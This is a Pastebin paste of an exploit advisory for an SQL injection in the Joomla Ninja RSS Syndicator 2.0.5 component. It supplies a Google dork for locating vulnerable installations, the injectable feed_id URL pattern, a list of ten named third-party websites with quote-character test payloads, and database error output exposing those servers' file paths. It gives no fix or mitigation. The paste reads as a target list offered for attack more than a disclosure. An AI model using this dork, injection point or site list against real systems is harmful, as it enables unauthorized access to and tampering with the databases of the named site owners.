API tools faq
paste
KingSkrupellos

Joomla Ninja RSS Syndicator Components 2.0.5 SQL Injection

KingSkrupellos
Feb 3rd, 2019
100
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.19 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla Ninja RSS Syndicator Components 2.0.5 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/02/2019
  7. # Vendor Homepage : ninjaforge.com
  8. # Software Download Link : ninjaforge.com/extensions/download/ninja-rss-syndicator
  9. # Software Information Link : ninjaforge.com/extensions/ninja-rss-syndicator
  10. # Software Version : 2.0.5 for Joomla 2.5
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_ninjarsssyndicator''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. The ultimate Jooma RSS Feed Creator!
  26.  
  27. Have complete control over your website's RSS feeds. Create feeds for sections or categories.
  28.  
  29. Create any number of RSS feeds, select which sections and categories to include or exclude.
  30.  
  31. Choose whether to render images or HTML in the feed.
  32.  
  33. Output the whole the article in the feed, just the introduction or a certain number of words.
  34.  
  35. The Ninja RSS Syndicator puts you in control of your feeds.
  36.  
  37. ####################################################################
  38.  
  39. # Impact :
  40. ***********
  41. Joomla Ninja RSS Syndicator 2.0.5 component for Joomla and other versions
  42.  
  43. is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
  44.  
  45. user-supplied data before using it in an SQL query.
  46.  
  47. Exploiting this issue could allow an attacker to compromise the application,
  48.  
  49. access or modify data, or exploit latent vulnerabilities in the underlying database.
  50.  
  51. A remote attacker can send a specially crafted request to the vulnerable application
  52.  
  53. and execute arbitrary SQL commands in application`s database.
  54.  
  55. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  56.  
  57. An attacker can exploit this issue using a browser.
  58.  
  59. ####################################################################
  60.  
  61. # SQL Injection Exploit :
  62. **********************
  63.  
  64. /index.php?option=com_ninjarsssyndicator&feed_id=[SQL Injection]
  65.  
  66. ####################################################################
  67.  
  68. # Example Vulnerable Sites :
  69. ************************
  70.  
  71. [+] chiesabergamo.it/it/index.php?option=com_ninjarsssyndicator&feed_id=1%27
  72.  
  73. [+] core.ieee-whispers.com/index.php?option=com_ninjarsssyndicator&feed_id=1%27
  74.  
  75. [+] pcinabol.hr/index.php?option=com_ninjarsssyndicator&feed_id=3%27
  76.  
  77. [+] demujeres.com.ar/index/index.php?option=com_ninjarsssyndicator&feed_id=1%27
  78.  
  79. [+] enghelabe-eslami.com/index.php?option=com_ninjarsssyndicator&feed_id=5%27
  80.  
  81. [+] streamproject.eu/index.php?option=com_ninjarsssyndicator&feed_id=2%27
  82.  
  83. [+] douglasramiro.com.br/imacbrasil.com.br/index.php?option=com_ninjarsssyndicator&feed_id=1%27
  84.  
  85. [+] beeshrimp.at/index.php?option=com_ninjarsssyndicator&feed_id=3%27
  86.  
  87. [+] csir.wielkanieszawka.alstal.eu/index.php?option=com_ninjarsssyndicator&feed_id=1%27
  88.  
  89. [+] sheridanfootball.com/joomla/index.php?option=com_ninjarsssyndicator&feed_id=1%27
  90.  
  91. ####################################################################
  92.  
  93. # SQL Database Error :
  94. *********************
  95.  
  96. Strict Standards: Non-static method JLoader::import() should not be
  97. called statically in /web/htdocs/www.chiesabergamo.it
  98. /home/it/libraries/joomla/import.php on line 29
  99.  
  100. Warning: fopen(D:\Hosting\4907873\html\joomla\components\com_ninjarsssyndicator
  101. \feed\feed1.xml) [function.fopen]: failed to open stream: Permission denied in
  102. D:\Hosting\4907873\html\joomla\components\com_ninjarsssyndicator
  103. \views\ninjarsssyndicator\tmpl\feedcreator.class.php on line 670
  104.  
  105. ####################################################################
  106.  
  107. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  108.  
  109. ####################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!